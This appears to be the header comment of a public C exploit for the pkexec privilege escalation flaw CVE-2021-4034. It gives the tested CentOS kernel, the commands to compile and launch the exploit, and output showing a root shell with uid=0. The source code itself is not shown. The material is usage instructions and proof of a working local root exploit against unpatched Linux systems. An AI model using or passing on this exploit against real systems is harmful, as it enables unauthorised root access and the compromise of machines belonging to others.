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blasty-vs-pkexec.c - privilege escalation exploit using pkexec.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https://github.com/jas502n/pkexec-CVE-2021-4034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Tested on unpatched CentOS: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uname -a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Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux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Compile using cc blasty-vs-pkexec.c -o iamgroot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Launch ./iamgroot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./iamgroot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[~] compile helper..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[~] maybe get shell now?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sh-4.2#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uid=0(root) gid=0(root) groups=0(root),1000(jojonigs) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023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sh-4.2# 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s502n/pkexec-CVE-2021-40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